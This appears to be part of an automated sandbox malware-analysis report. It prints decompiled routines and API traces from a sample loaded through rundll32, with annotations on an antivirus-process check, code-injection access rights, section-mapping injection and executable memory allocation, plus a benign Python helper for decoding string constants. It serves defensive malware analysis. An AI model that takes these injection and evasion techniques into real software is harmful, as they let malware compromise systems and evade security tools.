                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00E56DB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID: ;E$;E
                                                          • API String ID: 3239747167-563190114
                                                          • Opcode ID: ae3d7d9163a74c488ddc249364e091d3c1aace7990f787923d93b91e991a2125
                                                          • Instruction ID: d318bfc2458706597f6b30a61194a072df31bcad4da8750bf516a1104d9b25e9
                                                          • Opcode Fuzzy Hash: ae3d7d9163a74c488ddc249364e091d3c1aace7990f787923d93b91e991a2125
                                                          • Instruction Fuzzy Hash: EB315C76A00209EFDB11DFAADC81AAEB7F9FB44306F544C29E905E7261D770DE089B11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 74%
E00E566CE(intOrPtr __edx, void** _a4, void** _a8) {
    intOrPtr _v8;               /* high dword of the FILETIME */
    struct _FILETIME* _v12;     /* low dword of the FILETIME */
    short _v56;                 /* wide-char buffer for the mapping name */
    struct _FILETIME* _t12;
    intOrPtr _t13;
    void* _t17;
    void* _t21;
    intOrPtr _t27;
    long _t28;
    void* _t30;

    _t27 = __edx;
    /* Current time as a 64-bit FILETIME written to _v12 (low) and _v8 (high). */
    _t12 = &_v12;
    GetSystemTimeAsFileTime(_t12);
    /* _aulldiv(time, 0x0000019254D38000): the divisor is 1,728,000,000,000
       100-ns units, i.e. 48 hours, so the quotient only changes every two days. */
    _push(0x192);
    _push(0x54d38000);
    _push(_v8);
    _push(_v12);
    L00E57DD6();
    _push(_t12);
    _v12 = _t12;
    _t13 = *0xe5a2d4; // 0x435d5a8
    _t5 = _t13 + 0xe5b84d; // 0x51b8df5
    _t6 = _t13 + 0xe5b580; // 0x530025
    /* _snwprintf(&_v56, 0x16, <format from the data section>, quotient):
       turns the two-day counter into the name of the mapping. */
    _push(0x16);
    _push(&_v56);
    _v8 = _t27;
    L00E57ABA();
    /* Page-file-backed mapping (INVALID_HANDLE_VALUE), PAGE_READWRITE (4),
       0x1000 bytes, named with the buffer built above. */
    _t17 = CreateFileMappingW(0xffffffff, 0xe5a2f8, 4, 0, 0x1000, &_v56); // executed
    _t30 = _t17;
    if(_t30 == 0) {
        _t28 = GetLastError();
    } else {
        /* 0xb7 = ERROR_ALREADY_EXISTS: only a mapping that already existed is used. */
        if(GetLastError() == 0xb7) {
            /* 6 = FILE_MAP_READ | FILE_MAP_WRITE */
            _t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
            if(_t21 == 0) {
                _t28 = GetLastError();
                if(_t28 != 0) {
                    goto L6;
                }
            } else {
                /* Hand the mapping handle and the view pointer back through the out-parameters. */
                *_a4 = _t30;
                *_a8 = _t21;
                _t28 = 0;
            }
        } else {
            /* The mapping was just created by this call: report 2 and discard it. */
            _t28 = 2;
            L6:
            CloseHandle(_t30);
        }
    }
    return _t28;
}

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00E543F5,?,00000001,?), ref: 00E566DA
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00E566F0
                                                          • _snwprintf.NTDLL ref: 00E56715
                                                          • CreateFileMappingW.KERNELBASE(000000FF,00E5A2F8,00000004,00000000,00001000,?), ref: 00E56731
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5,?), ref: 00E56743
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00E5675A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5), ref: 00E5677B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5,?), ref: 00E56783
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: eb527a70265ad87d89e7a18cde604b90a796c383884b27f96ba2bc187f889c56
                                                          • Instruction ID: 253c5dd13b37c4200b650fab1d9811f4596de6fb27aeb8754b482bc143d519b1
                                                          • Opcode Fuzzy Hash: eb527a70265ad87d89e7a18cde604b90a796c383884b27f96ba2bc187f889c56
                                                          • Instruction Fuzzy Hash: 0B210276600204FFCB249BA4DC05FDE7BB9AB48756F240922FE05FB1D1EB7099098B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0559C1AC,00000000), ref: 05592A37
                                                          • StrRChrA.SHLWAPI(059BA5B0,00000000,0000005C,00000000,00000001,?,0559C16C,00000000,?), ref: 05592A4C
                                                          • _strupr.NTDLL ref: 05592A62
                                                          • lstrlen.KERNEL32(059BA5B0), ref: 05592A6A
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,0559C16C,00000000,?), ref: 05592AEA
                                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,05573E36), ref: 05592B11
                                                          • GetLastError.KERNEL32(?), ref: 05592B2B
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05592B41
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 1098824789-0
                                                          • Opcode ID: 3a267bb63e5323356fa898c2ae86bcf675a475ccfaee28dd7cab2ec6910018b6
                                                          • Instruction ID: 30e9f476bdb27d972c85bb571abebce1c02a8854f370b4d380192df4291b5249
                                                          • Opcode Fuzzy Hash: 3a267bb63e5323356fa898c2ae86bcf675a475ccfaee28dd7cab2ec6910018b6
                                                          • Instruction Fuzzy Hash: 08312972A10215AFDF14AF74988AA7E7FA8F704350F06052BF512E3141DF7C5C48AB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0558B5D3
                                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0558B5E6
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0558B602
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0558B61F
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 0558B62C
                                                          • NtClose.NTDLL(?), ref: 0558B63E
                                                          • NtClose.NTDLL(?), ref: 0558B648
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: b323316cf661dc386b6d3580f4332577157db930a4dec63be1c8e68e1b59a8b2
                                                          • Instruction ID: 394d3289fa2cf447a46544f85e652b7d00979cc3313adccdd1650ba6a70e9e9c
                                                          • Opcode Fuzzy Hash: b323316cf661dc386b6d3580f4332577157db930a4dec63be1c8e68e1b59a8b2
                                                          • Instruction Fuzzy Hash: 9B210572A10219BBDF01AFA5DC45EEEBFBDFB48750F104026F901B6110D7719A489BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
E00E540DC(char _a4, void* _a8) {
    void* _v8;      /* token handle */
    void* _v12;     /* process handle */
    char _v16;      /* CLIENT_ID.UniqueThread (0) */
    void* _v20;     /* CLIENT_ID.UniqueProcess (the pid passed in _a4) */
    char _v24;
    char _v28;
    char _v32;
    char _v36;
    char _v40;
    void* _v44;     /* OBJECT_ATTRIBUTES, Length = 0x18, every other field zero */
    void** _t33;
    void* _t40;
    void* _t43;
    void** _t44;
    intOrPtr* _t47;
    char _t48;

    /* Five dword stores (rep stosd) clearing a run of stack locals. */
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    asm("stosd");
    _v20 = _a4;
    _t48 = 0;
    _v16 = 0;
    _a4 = 0;
    _v44 = 0x18;
    _v40 = 0;
    _v32 = 0;
    _v36 = 0;
    _v28 = 0;
    _v24 = 0;
    /* 0x400 = PROCESS_QUERY_INFORMATION */
    if(NtOpenProcess(&_v12, 0x400, &_v44, &_v20) >= 0) {
        /* NtOpenProcessToken(hProcess, TOKEN_QUERY (8), &hToken) */
        _t33 = &_v8;
        __imp__(_v12, 8, _t33);
        if(_t33 >= 0) {
            /* NtQueryInformationToken(hToken, TokenUser (1), NULL, 0, &needed): size probe only. */
            _t47 = __imp__;
            *_t47(_v8, 1, 0, 0, &_a4, _t43); // executed
            /* E00E55FBC wraps RtlAllocateHeap (see the subcall listed under APIs). */
            _t44 = E00E55FBC(_a4);
            if(_t44 != 0) {
                /* Second query fills the TOKEN_USER buffer. */
                _t40 = *_t47(_v8, 1, _t44, _a4, &_a4); // executed
                if(_t40 >= 0) {
                    /* TOKEN_USER.User.Sid is the first pointer in the buffer;
                       0x1c bytes of the SID are copied to the caller's buffer. */
                    memcpy(_a8, *_t44, 0x1c);
                    _t48 = 1;
                }
                E00E513CC(_t44);    /* releases the buffer (the matching free, by inference) */
            }
            NtClose(_v8); // executed
        }
        NtClose(_v12);
    }
    return _t48;    /* 1 when the SID was copied, otherwise 0 */
}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00E54123
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00E54136
                                                          • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E54152
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E5416F
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00E5417C
                                                          • NtClose.NTDLL(00000000), ref: 00E5418E
                                                          • NtClose.NTDLL(00000000), ref: 00E54198
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 5bb27f53fbd83ebb02c5d0e87249873767a075dd6b594b8b385dacd0b1effcb0
                                                          • Instruction ID: 4c1dbed92c23ad270c95eb3c6f5865d6555affbc7c46ed01f3b897281f402d0f
                                                          • Opcode Fuzzy Hash: 5bb27f53fbd83ebb02c5d0e87249873767a075dd6b594b8b385dacd0b1effcb0
                                                          • Instruction Fuzzy Hash: 462144B2901228BFDF00AF95CD45ADEBFBCEB08751F004462FA00F6160D7718A888BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
E00E52102() {
    char _v264;     /* PROCESSENTRY32.szExeFile (offset 36 into the structure below) */
    void* _v300;    /* PROCESSENTRY32, 296 bytes */
    void* _t5;
    int _t8;
    intOrPtr _t9;
    int _t15;
    void* _t17;

    _t15 = 0;
    /* TH32CS_SNAPPROCESS (2): snapshot of all running processes. */
    _t5 = CreateToolhelp32Snapshot(2, 0); // executed
    _t17 = _t5;
    if(_t17 != 0) {
        _t8 = Process32First(_t17, &_v300); // executed
        while(_t8 != 0) {
            _t9 = *0xe5a2d4; // 0x435d5a8
            _t2 = _t9 + 0xe5bde4; // 0x73617661: first dword of the needle string, "avas" as little-endian ASCII
            /* Case-insensitive substring match of the needle against each process name. */
            if(StrStrIA(&_v264, _t2) != 0) {
                _t15 = 1;   /* a matching process exists: stop scanning */
                break;
            }
            _t8 = Process32Next(_t17, &_v300);
        }
        CloseHandle(_t17);
    }
    return _t15;    /* 1 when a process name contains the needle, otherwise 0 */
}

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E52112 (dwFlags 2 = TH32CS_SNAPPROCESS)
                                                          • Process32First.KERNEL32(00000000,?), ref: 00E52125
                                                          • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 00E5213F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 00E52151
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E52160
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID: zu
                                                          • API String ID: 420147892-1569895686
                                                          • Opcode ID: cc3798eeb1a3ea41fde615323d3b56a66014c7b39bb144a15f7db08c15aeae09
                                                          • Instruction ID: b3af6246a4dbf096578d54a96333fb3fd09fdd1ff14f227a8aae94fe21e27d72
                                                          • Opcode Fuzzy Hash: cc3798eeb1a3ea41fde615323d3b56a66014c7b39bb144a15f7db08c15aeae09
                                                          • Instruction Fuzzy Hash: 11F096322025246AD720A7769E49EEB77ACDBC6316F0019A5FF05F2101EB249A4E4AA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
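
The string pointers in the routine above (and in the HTTP routine further down this page) are only visible as the immediates the decompiler prints beside them, 0x73617661 and 0x450047. Turning those into text is a small but recurring step when reading these listings, so here is an added example, not code from the sample or from Joe Sandbox, that finds every such trailing comment in a listing, unpacks the value as little-endian bytes and reports whichever of the ANSI or UTF-16LE readings is printable. Both encodings matter because the sample mixes A and W APIs (StrStrIA next to GetModuleFileNameW). The listing lines embedded in the block are copied from this page as constructed input; only the first four bytes of each string are recoverable this way, the rest lives in memory past the constant.

```python
"""Decode the immediate values the decompiler prints beside string pointers,
e.g. "_t2 = _t9 + 0xe5bde4; // 0x73617661".

Added example for reading this report; not code from the sample or from
Joe Sandbox. SAMPLE_LISTING is copied from the decompiled routines on this
page as constructed input.
"""
import re
import struct

# A hex immediate in a trailing decompiler comment ("// 0x73617661").
IMMEDIATE_RE = re.compile(r"//\s*(0x[0-9a-fA-F]{1,8})\b")


def _printable(text: str) -> bool:
    return bool(text) and all(32 <= ord(c) < 127 for c in text)


def decode_immediate(value: int) -> dict:
    """Interpret a 32-bit immediate as the first four bytes of a string.

    x86 is little-endian, so 0x73617661 sits in memory as 61 76 61 73,
    i.e. "avas" read as an ANSI string, while 0x450047 sits as 47 00 45 00,
    i.e. L"GE" read as UTF-16LE. Only these four bytes are recoverable from
    the constant; the real string continues in memory.
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    ansi = raw.split(b"\x00", 1)[0].decode("latin-1")
    try:
        wide = raw.decode("utf-16-le").split("\x00", 1)[0]
    except UnicodeDecodeError:  # lone surrogate etc.: not text
        wide = ""
    ansi_ok = ansi if _printable(ansi) else None
    wide_ok = wide if _printable(wide) else None
    # Prefer the longer printable reading ("GE" over the single "G").
    best = wide_ok if (wide_ok and len(wide_ok) > len(ansi_ok or "")) else ansi_ok
    return {"hex": f"0x{value:08x}", "bytes": raw,
            "ansi": ansi_ok, "utf16": wide_ok, "text": best}


def scan_listing(listing: str) -> list:
    """(line number, decoded dict) for every '// 0x...' comment in a
    decompiler listing whose value reads as printable text in some encoding."""
    hits = []
    for lineno, line in enumerate(listing.splitlines(), 1):
        for match in IMMEDIATE_RE.finditer(line):
            decoded = decode_immediate(int(match.group(1), 16))
            if decoded["text"]:
                hits.append((lineno, decoded))
    return hits


# Constructed input: the string-pointer lines from the two routines on this page.
SAMPLE_LISTING = """\
_t9 =  *0xe5a2d4; // 0x435d5a8
_t2 = _t9 + 0xe5bde4; // 0x73617661
if(StrStrIA( &_v264, _t2) != 0) {
_t67 = __imp__; // 0x7042f5a0
_t21 = _t45 + 0xe5b76c; // 0x450047
"""

if __name__ == "__main__":
    for lineno, d in scan_listing(SAMPLE_LISTING):
        print(f"line {lineno}: {d['hex']} -> {d['text']!r} "
              f"(ansi={d['ansi']!r}, utf16={d['utf16']!r})")
```

Run stand-alone it reports line 2 as "avas" and line 5 as "GE"; the delta 0x435d5a8 and the import address 0x7042f5a0 are correctly rejected because neither reading is printable. Pointing the scanner at a whole exported listing is the quickest way to collect the A/W string heads a sample references before the full strings are recovered from a memory dump.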

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05590A02
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05590A0F
                                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05590A9B (ThreadInformationClass 9 = ThreadQuerySetWin32StartAddress on the current thread)
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 05590AA6
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 05590AAF
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 05590AC4
                                                            • Part of subcall function 05589DA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05590A3D,?), ref: 05589DA8
                                                            • Part of subcall function 05589DA0: GetVersion.KERNEL32 ref: 05589DB7
                                                            • Part of subcall function 05589DA0: GetCurrentProcessId.KERNEL32 ref: 05589DC6
                                                            • Part of subcall function 05589DA0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05589DE3 (dwDesiredAccess 0x10047A = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, the rights needed for code injection)
                                                            • Part of subcall function 0557BD01: memcpy.NTDLL(00000000,?,?,?), ref: 0557BD60
                                                            • Part of subcall function 05592015: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05577083), ref: 0559203B
                                                            • Part of subcall function 055724A8: OpenProcess.KERNEL32(00000400,00000000,?), ref: 055724C3 (dwDesiredAccess 0x400 = PROCESS_QUERY_INFORMATION, enough for the IsWow64Process check that follows)
                                                            • Part of subcall function 055724A8: IsWow64Process.KERNEL32(?,?), ref: 055724D4
                                                            • Part of subcall function 055724A8: CloseHandle.KERNEL32(?,?,?), ref: 055724E7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                          • String ID:
                                                          • API String ID: 3825956196-0
                                                          • Opcode ID: 324a4cce3e0dbd1fc0d7feeef100aaf9fa965cef45dad611c908efd5767434dd
                                                          • Instruction ID: e7f186f9a1c3a9aa8747ef982c20df14ca8c249101e3e7cc628e0b72638ff0d2
                                                          • Opcode Fuzzy Hash: 324a4cce3e0dbd1fc0d7feeef100aaf9fa965cef45dad611c908efd5767434dd
                                                          • Instruction Fuzzy Hash: E831D432A01114AFCF25EFA4DC89D7EBBB9FB44760B160526F502E71A0DA3C9D44D791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(-00000040,0558BE0C,00000800,00000000,00000000,00000000,75145520), ref: 05573A37
                                                            • Part of subcall function 055747C1: GetModuleHandleA.KERNEL32(?,00000020,00000000,0557D41D,?,?,?,?,05573905,?,?,00000000,00000000,75145520), ref: 055747E6
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574808
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 0557481E
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574834
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 0557484A
                                                            • Part of subcall function 055747C1: GetProcAddress.KERNEL32(00000000,?), ref: 05574860
                                                            • Part of subcall function 0558A8F7: NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                            • Part of subcall function 0558391E: memcpy.NTDLL(?,?,05571A31,00000000,00000000,?,00000000,00000000,?,?,00000000,00000000,75145520), ref: 05583984
                                                            • Part of subcall function 0558391E: memcpy.NTDLL(00000000,?,?), ref: 055839E3
                                                          • memcpy.NTDLL(?,00000000,?,?,0557D41D,00000000,00000000,00000000,?,?,00000000,00000000,75145520), ref: 05573964
                                                          • memcpy.NTDLL(00000018,00000000,00000018,?,0557D41D,00000000,00000000,00000000,?,?,00000000,00000000,75145520), ref: 055739B0
                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,75145520), ref: 05573A75
                                                          • memset.NTDLL ref: 05573AB7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                                                          • String ID:
                                                          • API String ID: 1575695328-0
                                                          • Opcode ID: ded4e2cce26759fa4c4b604456e301f6720ad39050fa087bb798c9b4784c8c2f
                                                          • Instruction ID: e9c08e5e572cd86574d2f02a85de6fe990efe5539cab75460d4fb48057bb2318
                                                          • Opcode Fuzzy Hash: ded4e2cce26759fa4c4b604456e301f6720ad39050fa087bb798c9b4784c8c2f
                                                          • Instruction Fuzzy Hash: 3B916C71A0060EEFCF10DFA8D885AAEBBB5FF04314F154869E801A7650E735AA54EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 0558B8D5 (DesiredAccess 0xF001F = SECTION_ALL_ACCESS, AllocationAttributes 0x8000000 = SEC_COMMIT, FileHandle 0: a pagefile-backed section, the usual carrier for section-mapping injection)
                                                            • Part of subcall function 0558A8F7: NtMapViewOfSection.NTDLL(00000000,000000FF,0558B8EC,00000000,00000000,0558B8EC,00000000,00000002,00000000,?,?,00000000,0558B8EC,000000FF,00000000), ref: 0558A925
                                                          • memset.NTDLL ref: 0558B8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          • Opcode ID: 361bd8fbd3ad8024ebd352a4977c6b370a89d7e86cbdc425b418d7e79a00c4ac
                                                          • Instruction ID: df6c2b78daf1d0fbc4c686d84d1dc82dc7b9fac33410c326058d38bb8120333c
                                                          • Opcode Fuzzy Hash: 361bd8fbd3ad8024ebd352a4977c6b370a89d7e86cbdc425b418d7e79a00c4ac
                                                          • Instruction Fuzzy Hash: 81210BB6E00209AFDB11EFA9C8849EEFBB9FB48354F10452AE515F3250D7349A458FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000318), ref: 055907C0
                                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 055907DC (class 0 = ProcessBasicInformation with a 0x30-byte buffer, the 64-bit PROCESS_BASIC_INFORMATION that carries the target's PEB address; 32-bit code inspecting a 64-bit process)
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                            • Part of subcall function 05580E3E: GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                            • Part of subcall function 05580E3E: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05590946
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 3547194813-0
                                                          • Opcode ID: 8b1a81a6b1483d5879948ff8eb088f2ddce026d93ddb408c038ee8361b768742
                                                          • Instruction ID: 521932493da40575f9abcb9f2ba118d7b90fad2edc423c2e3b78ed7381cd44bc
                                                          • Opcode Fuzzy Hash: 8b1a81a6b1483d5879948ff8eb088f2ddce026d93ddb408c038ee8361b768742
                                                          • Instruction Fuzzy Hash: 97616071A0020AAFDF14DFA5C884BEEBBB5FF48700F044559E959E7291D738E954CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0558588C
                                                          • GetProcAddress.KERNEL32(?), ref: 055858B4
                                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,?,?,00001000,00000000), ref: 055858D2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                                          • String ID:
                                                          • API String ID: 2968673968-0
                                                          • Opcode ID: b701da54cbfc6256989853f352629e96833df37c741d3c23383a5a9e1ad1b317
                                                          • Instruction ID: b34083cb7dc1e42ff804e9e3e6a1da6751865f4058fa512fd225572cd5059940
                                                          • Opcode Fuzzy Hash: b701da54cbfc6256989853f352629e96833df37c741d3c23383a5a9e1ad1b317
                                                          • Instruction Fuzzy Hash: 7F117031A14219BFDB10EB94DC4AFA97BA9FB84754F050026F905FB290EB74ED09DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D (AllocationType 0x3000 = MEM_COMMIT | MEM_RESERVE, Protect 0x40 = PAGE_EXECUTE_READWRITE)
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
                                                          • SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                                          • String ID:
